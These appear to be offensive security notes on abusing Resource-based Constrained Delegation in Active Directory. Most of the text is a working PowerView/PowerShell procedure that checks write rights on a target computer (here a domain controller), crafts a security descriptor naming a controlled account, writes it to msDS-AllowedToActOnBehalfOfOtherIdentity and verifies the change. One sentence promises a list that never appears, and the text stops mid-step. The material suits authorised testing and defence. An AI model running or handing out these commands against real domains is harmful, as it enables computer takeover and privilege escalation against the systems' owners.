Resource-based Constrained Delegation (RBCD)

If an account that can edit the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of another object (e.g. through a GenericWrite ACE, see Abusing ACLs) is compromised, an attacker can use it to populate that attribute, thereby configuring that object for RBCD.


Machine accounts can edit their own msDS-AllowedToActOnBehalfOfOtherIdentity attribute, so a relayed machine account authentication (for example, NTLM relayed to LDAP) is enough to configure RBCD on that machine.

For this attack to work, the attacker needs to populate the target attribute with the SID of an account that Kerberos can treat as a service, because a service ticket will be requested for it. In short, the account must be either (see Kerberos tickets for more information about the following):

The common way to conduct these attacks is to create a computer account. This is usually possible thanks to the domain-level attribute ms-DS-MachineAccountQuota, which by default lets any authenticated user create up to 10 computer accounts. Check its value before relying on it: hardened domains may have set it to 0.

Resource-based Constrained Delegation ACL-based Computer Object Takeover

The target computer object we are taking over

$TargetComputer = "dc.here.local"

Optional: list accounts flagged TRUSTED_TO_AUTH_FOR_DELEGATION (0x1000000 = 16777216, i.e. protocol transition), which these notes refer to as "S4U2Self enabled"

Get-DomainObject -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=16777216)' -Properties samaccountname,useraccountcontrol

Get the SID of the attacker (the account that holds rights over the target)

$AttackerSID = Get-DomainUser userhere -Properties objectsid | Select -Expand objectsid

Check for GenericWrite (or equivalent) rights on $TargetComputer

$ACE = Get-DomainObjectACL $TargetComputer | ?{$_.SecurityIdentifier -match $AttackerSID}

$ACE

ConvertFrom-SID $ACE.SecurityIdentifier

The account we control, to which we want to grant S4U access to the target (it must be an account Kerberos can issue a service ticket for, e.g. a computer account)

$S4UIdentity = "domain\target"

Translate the identity into a security identifier

$IdentitySID = ((New-Object -TypeName System.Security.Principal.NTAccount -ArgumentList $S4UIdentity).Translate([System.Security.Principal.SecurityIdentifier])).Value

Substitute the SID into the raw SDDL. Note that this descriptor replaces whatever the attribute already holds; if the target already has entries, read the existing descriptor first and add the ACE to it rather than overwriting it

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($IdentitySID))"

Get the binary form of the security descriptor

$SDBytes = New-Object byte[] ($SD.BinaryLength)

$SD.GetBinaryForm($SDBytes, 0)

Set the new security descriptor on 'msds-allowedtoactonbehalfofotheridentity'

Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

Verify that the ACE was added correctly

$RawBytes = Get-DomainComputer $TargetComputer -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity

$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0

$Descriptor.DiscretionaryAcl

ConvertFrom-SID $Descriptor.DiscretionaryAcl.SecurityIdentifier

On the target where S4U2Self is enabled
